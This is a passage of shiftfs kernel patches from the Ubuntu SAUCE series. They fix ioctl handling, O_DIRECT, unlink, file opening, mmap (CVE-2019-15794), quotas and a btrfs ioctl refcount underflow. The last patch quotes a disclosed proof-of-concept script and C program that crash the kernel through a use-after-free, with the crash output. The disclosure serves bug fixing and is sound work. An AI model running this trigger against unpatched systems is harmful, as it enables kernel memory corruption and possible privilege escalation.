+ 	default:
+-		if (!in_ioctl_whitelist(cmd) ||
++		if (!in_ioctl_whitelist(cmd, arg) ||
+ 		    !shiftfs_passthrough_ioctls(file->f_path.dentry->d_sb->s_fs_info))
+ 			return -ENOTTY;
+ 	}
+@@ -1555,7 +1570,7 @@ static long shiftfs_compat_ioctl(struct file *file, unsigned int cmd,
+ 	case FS_IOC32_SETFLAGS:
+ 		break;
+ 	default:
+-		if (!in_ioctl_whitelist(cmd) ||
++		if (!in_ioctl_whitelist(cmd, arg) ||
+ 		    !shiftfs_passthrough_ioctls(file->f_path.dentry->d_sb->s_fs_info))
+ 			return -ENOIOCTLCMD;
+ 	}
+-- 
+2.39.2
+
+From cd66a65bbea66683404adadd7d61ec02d04ac21a Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian@brauner.io>
+Date: Fri, 19 Jul 2019 17:50:46 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: add O_DIRECT support
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1837223
+
+This enabled O_DIRECT support for shiftfs if the underlay supports it.
+
+Currently shiftfs does not handle O_DIRECT if the underlay supports it.
+This is blocking dqlite - an essential part of LXD - from profiting from
+the performance benefits of O_DIRECT on suitable filesystems when used
+with async io such as aio or io_uring.
+Overlayfs cannot support this directly since the upper filesystem in
+overlay can be any filesystem. So if the upper filesystem does not
+support O_DIRECT but the lower filesystem does you're out of luck.
+Shiftfs does not suffer from the same problem since there is not concept
+of an upper filesystem in the same way that overlayfs has it.
+Essentially, shiftfs is a transparent shim relaying everything to the
+underlay while overlayfs' upper layer is not (completely).
+
+Cc: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 3 +++
+ 1 file changed, 3 insertions(+)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 49f6714e9f95..addaa6e21e57 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1126,6 +1126,9 @@ static int shiftfs_open(struct inode *inode, struct file *file)
+ 	}
+ 
+ 	file->private_data = file_info;
++	/* For O_DIRECT dentry_open() checks f_mapping->a_ops->direct_IO. */
++	file->f_mapping = realfile->f_mapping;
++
+ 	file_info->realfile = realfile;
+ 	return 0;
+ }
+-- 
+2.39.2
+
+From 772a8ea3a85f0530a76bc8dbe4e91de92aa35180 Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian@brauner.io>
+Date: Fri, 19 Jul 2019 17:50:47 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: pass correct point down
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1837231
+
+This used to pass an unsigned long to copy_from_user() instead of a
+void __user * pointer. This will produce warning with a sufficiently
+advanced compiler.
+
+Cc: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index addaa6e21e57..9006201c243d 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1529,7 +1529,7 @@ static bool in_ioctl_whitelist(int flag, unsigned long arg)
+ 	case BTRFS_IOC_SUBVOL_GETFLAGS:
+ 		return true;
+ 	case BTRFS_IOC_SUBVOL_SETFLAGS:
+-		if (copy_from_user(&flags, arg, sizeof(flags)))
++		if (copy_from_user(&flags, argp, sizeof(flags)))
+ 			return false;
+ 
+ 		if (flags & ~BTRFS_SUBVOL_RDONLY)
+-- 
+2.39.2
+
+From ca8b1596f4e2a5a3c8ee7b7cb45d4703b329c891 Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian.brauner@ubuntu.com>
+Date: Thu, 29 Aug 2019 20:45:07 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: fix buggy unlink logic
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1841977
+
+The way we messed with setting i_nlink was brittle and wrong. We used to
+set the i_nlink of the shiftfs dentry to be deleted to the i_nlink count
+of the underlay dentry of the directory it resided in which makes no
+sense whatsoever. We also missed drop_nlink() which is crucial since
+i_nlink affects whether a dentry is cleaned up on dput().
+With this I cannot reproduce the bug anymore where shiftfs misleads zfs
+into believing that a deleted file can not be removed from disk because
+it is still referenced.
+
+Fixes: commit 87011da41961 ("shiftfs: rework and extend")
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 15 ++++++++++-----
+ 1 file changed, 10 insertions(+), 5 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 9006201c243d..e80db9480b5c 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -585,6 +585,7 @@ static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
+ {
+ 	struct dentry *lowerd = dentry->d_fsdata;
+ 	struct inode *loweri = dir->i_private;
++	struct inode *inode = d_inode(dentry);
+ 	int err;
+ 	const struct cred *oldcred;
+ 
+@@ -594,15 +595,19 @@ static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
+ 		err = vfs_rmdir(loweri, lowerd);
+ 	else
+ 		err = vfs_unlink(loweri, lowerd, NULL);
+-	inode_unlock(loweri);
+ 	revert_creds(oldcred);
+ 
+-	shiftfs_copyattr(loweri, dir);
+-	set_nlink(d_inode(dentry), loweri->i_nlink);
+-	if (!err)
++	if (!err) {
+ 		d_drop(dentry);
+ 
+-	set_nlink(dir, loweri->i_nlink);
++		if (rmdir)
++			clear_nlink(inode);
++		else
++			drop_nlink(inode);
++	}
++	inode_unlock(loweri);
++
++	shiftfs_copyattr(loweri, dir);
+ 
+ 	return err;
+ }
+-- 
+2.39.2
+
+From 81445d2871aef886eabb56c7f124d491f445fcc7 Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian.brauner@ubuntu.com>
+Date: Fri, 30 Aug 2019 14:14:31 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: mark slab objects
+ SLAB_RECLAIM_ACCOUNT
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1842059
+
+Shiftfs does not mark it's slab cache as reclaimable. While this is not
+a big deal it is not nice to the kernel in general. The shiftfs cache is
+not so important that it can't be reclaimed.
+
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index e80db9480b5c..a21cb473e000 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -2108,7 +2108,7 @@ static int __init shiftfs_init(void)
+ {
+ 	shiftfs_file_info_cache = kmem_cache_create(
+ 		"shiftfs_file_info_cache", sizeof(struct shiftfs_file_info), 0,
+-		SLAB_HWCACHE_ALIGN | SLAB_ACCOUNT | SLAB_MEM_SPREAD, NULL);
++		SLAB_RECLAIM_ACCOUNT | SLAB_HWCACHE_ALIGN | SLAB_ACCOUNT | SLAB_MEM_SPREAD, NULL);
+ 	if (!shiftfs_file_info_cache)
+ 		return -ENOMEM;
+ 
+-- 
+2.39.2
+
+From 3d0e90c90e6b1b915b9ac760c865529b28cf1cdd Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian.brauner@ubuntu.com>
+Date: Wed, 2 Oct 2019 09:57:14 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: rework how shiftfs opens files
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1846265
+
+This commit simplifies how shiftfs open files, both regular files an
+directories.
+
+In the first iteration, we implemented a kmem cache for struct
+shiftfs_file_info which stashed away a struct path and the struct file
+for the underlay. The path however was never used anywhere so the struct
+shiftfs_file_info and therefore the whole kmem cache can go away.
+Instead we move to the same model as overlayfs and just stash away the
+struct file for the underlay in file->private_data of the shiftfs struct
+file.
+Addtionally, we split the .open method for files and directories.
+Similar to overlayfs .open for regular files uses open_with_fake_path()
+which ensures that it doesn't contribute to the open file count (since
+this would mean we'd count double). The .open method for directories
+however used dentry_open() which contributes to the open file count.
+
+The basic logic for opening files is unchanged. The main point is to
+ensure that a reference to the underlay's dentry is kept through struct
+path.
+
+Various bits and pieces of this were cooked up in discussions Seth and I
+had in Paris.
+
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 105 +++++++++++++++++++++++----------------------------
+ 1 file changed, 47 insertions(+), 58 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index a21cb473e000..55bb32b611f2 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -31,13 +31,6 @@ struct shiftfs_super_info {
+ 	unsigned int passthrough_mark;
+ };
+ 
+-struct shiftfs_file_info {
+-	struct path realpath;
+-	struct file *realfile;
+-};
+-
+-struct kmem_cache *shiftfs_file_info_cache;
+-
+ static void shiftfs_fill_inode(struct inode *inode, unsigned long ino,
+ 			       umode_t mode, dev_t dev, struct dentry *dentry);
+ 
+@@ -1042,21 +1035,21 @@ static const struct inode_operations shiftfs_symlink_inode_operations = {
+ };
+ 
+ static struct file *shiftfs_open_realfile(const struct file *file,
+-					  struct path *realpath)
++					  struct inode *realinode)
+ {
+-	struct file *lowerf;
+-	const struct cred *oldcred;
++	struct file *realfile;
++	const struct cred *old_cred;
+ 	struct inode *inode = file_inode(file);
+-	struct inode *loweri = realpath->dentry->d_inode;
++	struct dentry *lowerd = file->f_path.dentry->d_fsdata;
+ 	struct shiftfs_super_info *info = inode->i_sb->s_fs_info;
++	struct path realpath = { .mnt = info->mnt, .dentry = lowerd };
+ 
+-	oldcred = shiftfs_override_creds(inode->i_sb);
+-	/* XXX: open_with_fake_path() not gauranteed to stay around, if
+-	 * removed use dentry_open() */
+-	lowerf = open_with_fake_path(realpath, file->f_flags, loweri, info->creator_cred);
+-	revert_creds(oldcred);
++	old_cred = shiftfs_override_creds(inode->i_sb);
++	realfile = open_with_fake_path(&realpath, file->f_flags, realinode,
++				       info->creator_cred);
++	revert_creds(old_cred);
+ 
+-	return lowerf;
++	return realfile;
+ }
+ 
+ #define SHIFTFS_SETFL_MASK (O_APPEND | O_NONBLOCK | O_NDELAY | O_DIRECT)
+@@ -1096,8 +1089,7 @@ static int shiftfs_change_flags(struct file *file, unsigned int flags)
+ 
+ static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
+ {
+-	struct shiftfs_file_info *file_info = file->private_data;
+-	struct file *realfile = file_info->realfile;
++	struct file *realfile = file->private_data;
+ 
+ 	lowerfd->flags = 0;
+ 	lowerfd->file = realfile;
+@@ -1111,51 +1103,57 @@ static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
+ 
+ static int shiftfs_open(struct inode *inode, struct file *file)
+ {
+-	struct shiftfs_super_info *ssi = inode->i_sb->s_fs_info;
+-	struct shiftfs_file_info *file_info;
+ 	struct file *realfile;
+-	struct path *realpath;
+ 
+-	file_info = kmem_cache_zalloc(shiftfs_file_info_cache, GFP_KERNEL);
+-	if (!file_info)
+-		return -ENOMEM;
+-
+-	realpath = &file_info->realpath;
+-	realpath->mnt = ssi->mnt;
+-	realpath->dentry = file->f_path.dentry->d_fsdata;
+-
+-	realfile = shiftfs_open_realfile(file, realpath);
+-	if (IS_ERR(realfile)) {
+-		kmem_cache_free(shiftfs_file_info_cache, file_info);
++	realfile = shiftfs_open_realfile(file, inode->i_private);
++	if (IS_ERR(realfile))
+ 		return PTR_ERR(realfile);
+-	}
+ 
+-	file->private_data = file_info;
++	file->private_data = realfile;
+ 	/* For O_DIRECT dentry_open() checks f_mapping->a_ops->direct_IO. */
+ 	file->f_mapping = realfile->f_mapping;
+ 
+-	file_info->realfile = realfile;
+ 	return 0;
+ }
+ 
+-static int shiftfs_release(struct inode *inode, struct file *file)
++static int shiftfs_dir_open(struct inode *inode, struct file *file)
+ {
+-	struct shiftfs_file_info *file_info = file->private_data;
++	struct file *realfile;
++	const struct cred *oldcred;
++	struct dentry *lowerd = file->f_path.dentry->d_fsdata;
++	struct shiftfs_super_info *info = inode->i_sb->s_fs_info;
++	struct path realpath = { .mnt = info->mnt, .dentry = lowerd };
++
++	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
++	realfile = dentry_open(&realpath, file->f_flags | O_NOATIME,
++			       info->creator_cred);
++	revert_creds(oldcred);
++	if (IS_ERR(realfile))
++		return PTR_ERR(realfile);
+ 
+-	if (file_info) {
+-		if (file_info->realfile)
+-			fput(file_info->realfile);
++	file->private_data = realfile;
+ 
+-		kmem_cache_free(shiftfs_file_info_cache, file_info);
+-	}
++	return 0;
++}
++
++static int shiftfs_release(struct inode *inode, struct file *file)
++{
++	struct file *realfile = file->private_data;
++
++	if (realfile)
++		fput(realfile);
+ 
+ 	return 0;
+ }
+ 
++static int shiftfs_dir_release(struct inode *inode, struct file *file)
++{
++	return shiftfs_release(inode, file);
++}
++
+ static loff_t shiftfs_dir_llseek(struct file *file, loff_t offset, int whence)
+ {
+-	struct shiftfs_file_info *file_info = file->private_data;
+-	struct file *realfile = file_info->realfile;
++	struct file *realfile = file->private_data;
+ 
+ 	return vfs_llseek(realfile, offset, whence);
+ }
+@@ -1274,8 +1272,7 @@ static int shiftfs_fsync(struct file *file, loff_t start, loff_t end,
+ 
+ static int shiftfs_mmap(struct file *file, struct vm_area_struct *vma)
+ {
+-	struct shiftfs_file_info *file_info = file->private_data;
+-	struct file *realfile = file_info->realfile;
++	struct file *realfile = file->private_data;
+ 	const struct cred *oldcred;
+ 	int ret;
+ 
+@@ -1671,8 +1668,7 @@ static int shiftfs_iterate_shared(struct file *file, struct dir_context *ctx)
+ {
+ 	const struct cred *oldcred;
+ 	int err = -ENOTDIR;
+-	struct shiftfs_file_info *file_info = file->private_data;
+-	struct file *realfile = file_info->realfile;
++	struct file *realfile = file->private_data;
+ 
+ 	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
+ 	err = iterate_dir(realfile, ctx);
+@@ -1698,13 +1694,13 @@ const struct file_operations shiftfs_file_operations = {
+ };
+ 
+ const struct file_operations shiftfs_dir_operations = {
++	.open			= shiftfs_dir_open,
++	.release		= shiftfs_dir_release,
+ 	.compat_ioctl		= shiftfs_compat_ioctl,
+ 	.fsync			= shiftfs_fsync,
+ 	.iterate_shared		= shiftfs_iterate_shared,
+ 	.llseek			= shiftfs_dir_llseek,
+-	.open			= shiftfs_open,
+ 	.read			= generic_read_dir,
+-	.release		= shiftfs_release,
+ 	.unlocked_ioctl		= shiftfs_ioctl,
+ };
+ 
+@@ -2106,19 +2102,12 @@ static struct file_system_type shiftfs_type = {
+ 
+ static int __init shiftfs_init(void)
+ {
+-	shiftfs_file_info_cache = kmem_cache_create(
+-		"shiftfs_file_info_cache", sizeof(struct shiftfs_file_info), 0,
+-		SLAB_RECLAIM_ACCOUNT | SLAB_HWCACHE_ALIGN | SLAB_ACCOUNT | SLAB_MEM_SPREAD, NULL);
+-	if (!shiftfs_file_info_cache)
+-		return -ENOMEM;
+-
+ 	return register_filesystem(&shiftfs_type);
+ }
+ 
+ static void __exit shiftfs_exit(void)
+ {
+ 	unregister_filesystem(&shiftfs_type);
+-	kmem_cache_destroy(shiftfs_file_info_cache);
+ }
+ 
+ MODULE_ALIAS_FS("shiftfs");
+-- 
+2.39.2
+
+From 0afd6d19d12a42d7905110a41cdb3815e023467c Mon Sep 17 00:00:00 2001
+From: Seth Forshee <seth.forshee@canonical.com>
+Date: Wed, 6 Nov 2019 09:38:57 -0600
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: Restore vm_file value when lower fs
+ mmap fails
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1850994
+
+shiftfs_mmap() overwrites vma->vm_file before calling the lower
+filesystem mmap but does not restore the original value on
+failure. This means it is giving a pointer to the lower fs file
+back to the caller with no reference, which is a bad practice.
+However, it does not lead to any issues with upstream kernels as
+no caller accesses vma->vm_file after call_mmap().
+
+With the aufs patches applied the story is different. Whereas
+mmap_region() previously fput a local variable containing the
+file it assigned to vm_file, it now calls vma_fput() which will
+fput vm_file, for which it has no reference, and the reference
+for the original vm_file is not put.
+
+Fix this by restoring vma->vm_file to the original value when the
+mmap call into the lower fs fails.
+
+CVE-2019-15794
+
+Reported-by: Jann Horn <jannh@google.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 15 +++++++++++----
+ 1 file changed, 11 insertions(+), 4 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 55bb32b611f2..57d84479026b 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1289,10 +1289,17 @@ static int shiftfs_mmap(struct file *file, struct vm_area_struct *vma)
+ 
+ 	shiftfs_file_accessed(file);
+ 
+-	if (ret)
+-		fput(realfile); /* Drop refcount from new vm_file value */
+-	else
+-		fput(file); /* Drop refcount from previous vm_file value */
++	if (ret) {
++		/*
++		 * Drop refcount from new vm_file value and restore original
++		 * vm_file value
++		 */
++		vma->vm_file = file;
++		fput(realfile);
++	} else {
++		/* Drop refcount from previous vm_file value */
++		fput(file);
++	}
+ 
+ 	return ret;
+ }
+-- 
+2.39.2
+
+From 5b548337ff886dfb00ec3a142693226394673126 Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian.brauner@ubuntu.com>
+Date: Wed, 23 Oct 2019 14:22:28 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: setup correct s_maxbytes limit
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1849482
+
+Set the s_maxbytes limit to MAX_LFS_FILESIZE.
+Currently shiftfs limits the maximum size for fallocate() needlessly
+causing calls such as fallocate --length 2GB ./file to fail. This
+limitation is arbitrary since it's not caused by the underlay but
+rather by shiftfs itself capping the s_maxbytes. This causes bugs such
+as the one reported in [1].
+
+[1]: https://github.com/lxc/lxd/issues/6333
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Acked-by: Connor Kuehl <connor.kuehl@canonical.com>
+Acked-by: Stefan Bader <stefan.bader@canonical.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 57d84479026b..6a2b5e3d0d53 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -2064,6 +2064,7 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
+ 	inode->i_private = dentry->d_inode;
+ 
+ 	sb->s_magic = SHIFTFS_MAGIC;
++	sb->s_maxbytes = MAX_LFS_FILESIZE;
+ 	sb->s_op = &shiftfs_super_ops;
+ 	sb->s_xattr = shiftfs_xattr_handlers;
+ 	sb->s_d_op = &shiftfs_dentry_ops;
+-- 
+2.39.2
+
+From fa7001e866380a4d2f45022295b6db1fd0cf12c5 Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian.brauner@ubuntu.com>
+Date: Wed, 23 Oct 2019 14:23:50 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: drop CAP_SYS_RESOURCE from effective
+ capabilities
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1849483
+
+Currently shiftfs allows to exceed project quota and reserved space on
+e.g. ext2. See [1] and especially [2] for a bug report. This is very
+much not what we want. Quotas and reserverd space settings set on the
+host need to respected. The cause for this issue is overriding the
+credentials with the superblock creator's credentials whenever we
+perform operations such as fallocate() or writes while retaining
+CAP_SYS_RESOURCE.
+
+The fix is to drop CAP_SYS_RESOURCE from the effective capability set
+after we have made a copy of the superblock creator's credential at
+superblock creation time. This very likely gives us more security than
+we had before and the regression potential seems limited. I would like
+to try this apporach first before coming up with something potentially
+more sophisticated. I don't see why CAP_SYS_RESOURCE should become a
+limiting factor in most use-cases.
+
+[1]: https://github.com/lxc/lxd/issues/6333
+[2]: https://github.com/lxc/lxd/issues/6333#issuecomment-545154838
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Acked-by: Connor Kuehl <connor.kuehl@canonical.com>
+Acked-by: Stefan Bader <stefan.bader@canonical.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 8 ++++++--
+ 1 file changed, 6 insertions(+), 2 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 6a2b5e3d0d53..0d6ce377b07c 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1958,6 +1958,7 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
+ 	sb->s_flags |= SB_POSIXACL;
+ 
+ 	if (sbinfo->mark) {
++		struct cred *cred_tmp;
+ 		struct super_block *lower_sb = path.mnt->mnt_sb;
+ 
+ 		/* to mark a mount point, must root wrt lower s_user_ns */
+@@ -2012,11 +2013,14 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
+ 			sbinfo->passthrough_mark = sbinfo->passthrough;
+ 		}
+ 
+-		sbinfo->creator_cred = prepare_creds();
+-		if (!sbinfo->creator_cred) {
++		cred_tmp = prepare_creds();
++		if (!cred_tmp) {
+ 			err = -ENOMEM;
+ 			goto out_put_path;
+ 		}
++		/* Don't override disk quota limits or use reserved space. */
++		cap_lower(cred_tmp->cap_effective, CAP_SYS_RESOURCE);
++		sbinfo->creator_cred = cred_tmp;
+ 	} else {
+ 		/*
+ 		 * This leg executes if we're admin capable in the namespace,
+-- 
+2.39.2
+
+From a73880c13fc011fba13bfbf3197b98500c8c4906 Mon Sep 17 00:00:00 2001
+From: Seth Forshee <seth.forshee@canonical.com>
+Date: Fri, 1 Nov 2019 10:41:03 -0500
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: Fix refcount underflow in btrfs ioctl
+ handling
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1850867
+
+shiftfs_btrfs_ioctl_fd_replace() installs an fd referencing a
+file from the lower filesystem without taking an additional
+reference to that file. After the btrfs ioctl completes this fd
+is closed, which then puts a reference to that file, leading to a
+refcount underflow. Original bug report and test case from Jann
+Horn is below.
+
+Fix this, and at the sametime simplify the management of the fd
+to the lower file for the ioctl. In
+shiftfs_btrfs_ioctl_fd_replace(), take the missing reference to
+the lower file and set FDPUT_FPUT so that this reference will get
+dropped on fdput() in error paths. Do not maintain the struct fd
+in the caller, as it the fd installed in the fd table is
+sufficient to properly clean up. Finally, remove the fdput() in
+shiftfs_btrfs_ioctl_fd_restore() as it is redundant with the
+__close_fd() call.
+
+Original report from Jann Horn:
+
+In shiftfs_btrfs_ioctl_fd_replace() ("//" comments added by me):
+
+ src = fdget(oldfd);
+ if (!src.file)
+  return -EINVAL;
+ // src holds one reference (assuming multithreaded execution)
+
+ ret = shiftfs_real_fdget(src.file, lfd);
+ // lfd->file is a file* now, but shiftfs_real_fdget didn't take any
+ // extra references
+ fdput(src);
+ // this drops the only reference we were holding on src, and src was
+ // the only thing holding a reference to lfd->file. lfd->file may be
+ // dangling at this point.
+ if (ret)
+  return ret;
+
+ *newfd = get_unused_fd_flags(lfd->file->f_flags);
+ if (*newfd < 0) {
+  // always a no-op
+  fdput(*lfd);
+  return *newfd;
+ }
+
+ fd_install(*newfd, lfd->file);
+ // fd_install() consumes a counted reference, but we don't hold any
+ // counted references. so at this point, if lfd->file hasn't been freed
+ // yet, its refcount is one lower than it ought to be.
+
+ [...]
+
+ // the following code is refcount-neutral, so the refcount stays one too
+ // low.
+ if (ret)
+  shiftfs_btrfs_ioctl_fd_restore(cmd, *lfd, *newfd, arg, v1, v2);
+
+shiftfs_real_fdget() is implemented as follows:
+
+static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
+{
+ struct shiftfs_file_info *file_info = file->private_data;
+ struct file *realfile = file_info->realfile;
+
+ lowerfd->flags = 0;
+ lowerfd->file = realfile;
+
+ /* Did the flags change since open? */
+ if (unlikely(file->f_flags & ~lowerfd->file->f_flags))
+  return shiftfs_change_flags(lowerfd->file, file->f_flags);
+
+ return 0;
+}
+
+Therefore, the following PoC will cause reference count overdecrements; I ran it
+with SLUB debugging enabled and got the following splat:
+
+=======================================
+user@ubuntu1910vm:~/shiftfs$ cat run.sh
+sync
+unshare -mUr ./run2.sh
+t run2user@ubuntu1910vm:~/shiftfs$ cat run2.sh
+set -e
+
+mkdir -p mnt/tmpfs
+mkdir -p mnt/shiftfs
+mount -t tmpfs none mnt/tmpfs
+mount -t shiftfs -o mark,passthrough=2 mnt/tmpfs mnt/shiftfs
+mount|grep shift
+touch mnt/tmpfs/foo
+gcc -o ioctl ioctl.c -Wall
+./ioctl
+user@ubuntu1910vm:~/shiftfs$ cat ioctl.c
+
+int main(void) {
+  int root = open("mnt/shiftfs", O_RDONLY);
+  if (root == -1) err(1, "open shiftfs root");
+  int foofd = openat(root, "foo", O_RDONLY);
+  if (foofd == -1) err(1, "open foofd");
+  struct btrfs_ioctl_vol_args iocarg = {
+    .fd = foofd
+  };
+  ioctl(root, BTRFS_IOC_SNAP_CREATE, &iocarg);
+  sleep(1);
+  void *map = mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, foofd, 0);
+  if (map != MAP_FAILED) munmap(map, 0x1000);
+}
+user@ubuntu1910vm:~/shiftfs$ ./run.sh
+none on /home/user/shiftfs/mnt/tmpfs type tmpfs (rw,relatime,uid=1000,gid=1000)
+/home/user/shiftfs/mnt/tmpfs on /home/user/shiftfs/mnt/shiftfs type shiftfs (rw,relatime,mark,passthrough=2)
+[ 183.463452] general protection fault: 0000 [#1] SMP PTI
+[ 183.467068] CPU: 1 PID: 2473 Comm: ioctl Not tainted 5.3.0-19-generic #20-Ubuntu
+[ 183.472170] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.12.0-1 04/01/2014
+[ 183.476830] RIP: 0010:shiftfs_mmap+0x20/0xd0 [shiftfs]
+[ 183.478524] Code: 20 cf 5d c3 c3 0f 1f 44 00 00 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 41 55 41 54 48 8b 87 c8 00 00 00 4c 8b 68 10 49 8b 45 28 <48> 83 78 60 00 0f 84 97 00 00 00 49 89 fc 49 89 f6 48 39 be a0 00
+[ 183.484585] RSP: 0018:ffffae48007c3d40 EFLAGS: 00010206
+[ 183.486290] RAX: 6b6b6b6b6b6b6b6b RBX: ffff93f1fb7908a8 RCX: 7800000000000000
+[ 183.489617] RDX: 8000000000000025 RSI: ffff93f1fb792208 RDI: ffff93f1f69fa400
+[ 183.491975] RBP: ffffae48007c3d60 R08: ffff93f1fb792208 R09: 0000000000000000
+[ 183.494311] R10: ffff93f1fb790888 R11: 00007f1d01d10000 R12: ffff93f1fb7908b0
+[ 183.496675] R13: ffff93f1f69f9900 R14: ffff93f1fb792208 R15: ffff93f22f102e40
+[ 183.499011] FS: 00007f1d01cd1540(0000) GS:ffff93f237a40000(0000) knlGS:0000000000000000
+[ 183.501679] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
+[ 183.503568] CR2: 00007f1d01bc4c10 CR3: 0000000242726001 CR4: 0000000000360ee0
+[ 183.505901] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
+[ 183.508229] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
+[ 183.510580] Call Trace:
+[ 183.511396] mmap_region+0x417/0x670
+[ 183.512592] do_mmap+0x3a8/0x580
+[ 183.513655] vm_mmap_pgoff+0xcb/0x120
+[ 183.514863] ksys_mmap_pgoff+0x1ca/0x2a0
+[ 183.516155] __x64_sys_mmap+0x33/0x40
+[ 183.517352] do_syscall_64+0x5a/0x130
+[ 183.518548] entry_SYSCALL_64_after_hwframe+0x44/0xa9
+[ 183.520196] RIP: 0033:0x7f1d01bfaaf6
+[ 183.521372] Code: 00 00 00 00 f3 0f 1e fa 41 f7 c1 ff 0f 00 00 75 2b 55 48 89 fd 53 89 cb 48 85 ff 74 37 41 89 da 48 89 ef b8 09 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 62 5b 5d c3 0f 1f 80 00 00 00 00 48 8b 05 61
+[ 183.527210] RSP: 002b:00007ffdf50bae98 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
+[ 183.529582] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 00007f1d01bfaaf6
+[ 183.531811] RDX: 0000000000000001 RSI: 0000000000001000 RDI: 0000000000000000
+[ 183.533999] RBP: 0000000000000000 R08: 0000000000000004 R09: 0000000000000000
+[ 183.536199] R10: 0000000000000001 R11: 0000000000000246 R12: 00005616cf6f5140
